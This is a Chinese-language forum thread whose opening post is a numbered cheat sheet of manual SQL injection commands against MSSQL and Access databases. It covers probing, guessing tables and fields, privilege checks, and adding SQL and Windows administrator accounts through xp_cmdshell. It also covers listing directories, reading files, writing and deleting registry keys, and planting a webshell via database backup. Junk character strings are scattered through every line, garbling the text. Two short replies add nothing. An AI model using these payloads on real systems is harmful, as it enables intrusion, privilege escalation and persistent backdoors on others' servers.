社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4217阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 k$nQY  
  2.初步判断是否是mssql ;and user>0 q^],K'  
yZ t}Jnv  
  3.注入参数是字符'and [查询条件] and ''=' "|{O%X  
pqPhtWi%PJ  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' xX l^\?HC  
CybHr#LBc  
  5.判断数据库系统 K9co_n_L  
gTRm  
  ;and (select count(*) from sysobjects)>0 mssql BJDe1W3;'  
9.R)iA  
  ;and (select count(*) from msysobjects)>0 access @; ayl  
w=Xil  
nA%H`/O{  
WAlsh  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 pyZ&[ *@  
$a(EF 6  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 +OkR7bl  
'`^<*;w  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 BBy"qkTe  
1bb~u/jU  
  9.(1)猜字段的ascii值(access) H"W%+{AR  
$FEG0&  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 U@v=q9'W  
y?W8FL  
  (2)猜字段的ascii值(mssql) '|n-w\ >Wv  
Hw8`/'M=%5  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 cF_hU"  
b'`8$;MII  
  10.测试权限结构(mssql) GuMsw*{>  
k WYjqv  
2`,{IHu*!  
0IoS|P}6a  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- IH?.s k  
F,^Q'$ !  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- \k;)m-0bj{  
ou6|;*>d  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- IbAGnl{  
$-9m8}U(Y  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- )`]w\s #  
s  bV6}  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- I3o6ym-i  
S/pTFlptCa  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ;3NA,JA#Y  
)|f!}( p  
  ;and 1=(select IS_MEMBER('db_owner'));-- 1lu _<?O  
@~Z:W<X  
%\-u&  
Kl~jcq&z  
  11.添加mssql和系统的帐户 Q}ho Y  
}~$zdgMT  
  ;exec master.dbo.sp_addlogin username;-- l=%v  
  ;exec master.dbo.sp_password null,username,password;-- Px:PoOw\  
(</cu$w>H)  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Dt\F]\6sd  
}ex2tkz  
  ;exec master.dbo.xp_cmdshell 'net user username password tv,iCV  
u(\O  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- #kT3Sx  
rz0~W6 U  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- +9>t; Ty  
2w93 ~j  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 'Uqz,  
:N5R.@9  
gTZ1LJ  
'~A~gK0  
  12.(1)遍历目录 .x7d!t:(D  
~0r:Wcj x  
  ;create table dirs(paths varchar(100), id int) bY7d  
K:/%7A_{  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' eZs34${fN  
i[A$K~f  
  ;and (select top 1 paths from dirs)>0 ,o\v umx  
!u@e^J{Ao  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 09pnM|8A  
"#^11o8  
4Y8/>uL  
62Yi1<kV@  
  (2)遍历目录 9r!psRA:`)  
io^^f|  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Ul7)CT2:  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 7a 4G:  
[5^"U+`{x  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 z 7OTL<h  
#:v}d+  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 JX@/rXFY}  
FS30RP3 `/  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 %g}ri8  
PvX>+y5  
?"[b408-  
u-0-~TwD  
  13.mssql中的存储过程 !\.x7N<)0  
Im i)YC  
  xp_regenumvalues 注册表根键, 子键 7*]O]6rP  
DE:FWD<}  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 _n(O?M&x  
'ek7e.x|V  
  xp_regread 根键,子键,键值名 EQXvEJ^  
l[mXbQd  
  ;exec xp_regread V~` ?J6  
XfmPq'#Z  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 57^ X@ra$  
LC)-aw>-  
  xp_regwrite 根键,子键, 值名, 值类型, 值 yZ=wT,Y  
`=8g%O|T  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 @#$5_uU8\(  
a,IE;5kG  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 H->J.5~,K  
Q)S0z2  
  xp_regdeletevalue 根键,子键,值名 ,[ &@?  
0q(}nv  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ZW n j-  
p me5frM|  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 + DFG762  
k\X1`D}R  
sui3(wb  
E c[-@5x  
  14.mssql的backup创建webshell OD 09XO  
 +T02AS  
  use model ^=@L(;Y  
0@ []l{N  
  create table cmd(str image); #@Yw]@5M  
uH S)  
  insert into cmd(str) values (''); B B*]" gT  
HTuv_kE  
  backup database model to disk='c:\l.asp'; 4`Qu+&4J  
6Pc3;X~  
aaW(S K  
=n|n%N4Y  
  15.mssql内置函数 /9<zG}:B  
.XQ_,  
  ;and (select @@version)>0 获得Windows的版本号 qB PUB(  
=Is.T  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa +x$GwX  
~p^&` FA  
  ;and (select user_name())>0 爆当前系统的连接用户 NrPs :`  
=NxT9$V  
  ;and (select db_name())>0 得到当前连接的数据库 zsnXPRF  
y6tzmyg  
_Vr>/f  
&|'k)6Rx  
  16.简洁的webshell 57*`y'C W  
O+hN?/>v  
  use model ^Rriu $\  
H7!j5^  
  create table cmd(str image); A]^RV{P  
R,?7|x  
  insert into cmd(str) values (''); U 1!6%x  
k_$:?$  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八